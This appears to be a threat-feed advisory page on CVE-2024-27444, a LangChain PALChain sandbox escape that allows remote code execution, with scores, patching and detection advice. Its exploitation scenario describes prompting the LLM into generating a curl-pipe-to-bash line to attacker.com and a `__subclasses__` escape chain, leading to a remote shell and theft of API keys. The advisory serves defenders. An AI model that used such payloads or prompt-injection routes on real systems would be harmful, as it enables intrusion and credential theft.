AI Threat Alert AI Threat Alert

CVE-2024-27444: LangChain Experimental: RCE via Python sandbox escape

CRITICAL PoC AVAILABLE CISA: TRACK*
Published February 26, 2024
CISO Take

CVE-2024-27444 is a critical RCE in LangChain's PALChain component that fully bypasses the prior patch for CVE-2023-44467 — a patch bypass on a known critical is a top priority. Any application using langchain-experimental for Python code generation and execution is exploitable by unauthenticated remote attackers with no user interaction required. Upgrade to langchain-experimental >= 0.1.8 immediately; if patching is blocked, disable PALChain entirely and isolate any LangChain workloads in hardened containers with no network egress.

Risk Assessment

Severity is critical with CVSS 9.8 (AV:N/AC:L/PR:N/UI:N). The attack complexity is trivial — Python's dunder attribute escape techniques (__import__, __subclasses__, etc.) are well-documented and widely used in CTF and red team toolkits. The fact that this is a bypass of a prior fix (CVE-2023-44467) signals that the original patch was narrowly scoped and the root cause was not properly addressed. LangChain is pervasive in AI agent deployments, expanding the blast radius significantly. No evidence of active KEV listing as of enrichment date, but the low barrier to exploitation means weaponization is likely.

Affected Systems

Package Ecosystem Vulnerable Range Patched
langchain-experimental pip No patch
135.7K OpenSSF 6.5 2.6K dependents Pushed 7d ago 17% patched ~256d to patch Full package profile →

Do you use langchain-experimental? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 35% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps

  1. PATCH

    Upgrade langchain-experimental to >= 0.1.8 immediately. Verify via pip show langchain-experimental.

  2. WORKAROUND

    If patching is not immediately possible, audit all code for PALChain usage and disable it — replace with a sandboxed code execution environment (e.g., E2B, Docker subprocess with seccomp).

  3. ISOLATE

    Run all LangChain workloads in containers with no-new-privileges, dropped capabilities, and read-only filesystems. Block outbound network from the container unless strictly required.

  4. DETECT

    Search application logs for PALChain invocations containing __import__, __subclasses__, __builtins__, __globals__, __mro__, __base__, or __bases__. Instrument PALChain inputs/outputs with a WAF or input validation layer.

  5. INVENTORY

    Identify all internal services using langchain-experimental via SBOM or dependency scanning (Dependabot, Snyk, Grype).

CISA SSVC Assessment

Decision Track*
Exploitation none
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Agent AML.T0010.001 AML.T0049 AML.T0050 AML.T0053

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - Security of AI System
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place to respond to AI risk.
OWASP LLM Top 10
LLM02 - Insecure Output Handling LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2024-27444?

CVE-2024-27444 is a critical RCE in LangChain's PALChain component that fully bypasses the prior patch for CVE-2023-44467 — a patch bypass on a known critical is a top priority. Any application using langchain-experimental for Python code generation and execution is exploitable by unauthenticated remote attackers with no user interaction required. Upgrade to langchain-experimental >= 0.1.8 immediately; if patching is blocked, disable PALChain entirely and isolate any LangChain workloads in hardened containers with no network egress.

Is CVE-2024-27444 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-27444, increasing the risk of exploitation.

How to fix CVE-2024-27444?

1. PATCH: Upgrade langchain-experimental to >= 0.1.8 immediately. Verify via `pip show langchain-experimental`. 2. WORKAROUND: If patching is not immediately possible, audit all code for PALChain usage and disable it — replace with a sandboxed code execution environment (e.g., E2B, Docker subprocess with seccomp). 3. ISOLATE: Run all LangChain workloads in containers with no-new-privileges, dropped capabilities, and read-only filesystems. Block outbound network from the container unless strictly required. 4. DETECT: Search application logs for PALChain invocations containing `__import__`, `__subclasses__`, `__builtins__`, `__globals__`, `__mro__`, `__base__`, or `__bases__`. Instrument PALChain inputs/outputs with a WAF or input validation layer. 5. INVENTORY: Identify all internal services using langchain-experimental via SBOM or dependency scanning (Dependabot, Snyk, Grype).

What systems are affected by CVE-2024-27444?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM pipelines with code execution, RAG pipelines with code generation, AI-powered developer tools.

What is the CVSS score for CVE-2024-27444?

CVE-2024-27444 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.15%.

Technical Details

NVD Description

langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-44467 fix and execute arbitrary code via the __import__, __subclasses__, __builtins__, __globals__, __getattribute__, __bases__, __mro__, or __base__ attribute in Python code. These are not prohibited by pal_chain/base.py.

Exploitation Scenario

An adversary targeting an AI-powered application — such as a coding assistant, data analysis chatbot, or AI agent with tool-use — identifies that the backend uses LangChain's PALChain for natural language to code translation. The attacker crafts an input prompt that instructs the LLM to generate Python code leveraging `__import__('os').system('curl attacker.com/shell.sh | bash')` or uses `().__class__.__mro__[-1].__subclasses__()` to locate and invoke `subprocess.Popen` from the builtins. PALChain's base.py executes this code without blocking the restricted attributes, granting the attacker a remote shell on the host. From there the attacker pivots to exfiltrate Anthropic/OpenAI API keys from environment variables, access internal vector databases, or move laterally within the cloud environment.

Weaknesses (CWE)

CWE-749

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
February 26, 2024
Last Modified
July 14, 2025
First Seen
February 26, 2024

Related Vulnerabilities

CRITICAL CVE-2025-2828 10.0

LangChain RequestsToolkit: SSRF exposes cloud metadata

Same package: langchain
CRITICAL CVE-2023-34541 9.8

LangChain: RCE via unsafe load_prompt deserialization

Same package: langchain
CRITICAL CVE-2023-29374 9.8

LangChain: RCE via prompt injection in LLMMathChain

Same package: langchain
CRITICAL CVE-2023-34540 9.8

LangChain: RCE via JiraAPIWrapper crafted input

Same package: langchain
CRITICAL CVE-2023-36258 9.8

LangChain: unauthenticated RCE via code injection

Same package: langchain
Back to Threat Feed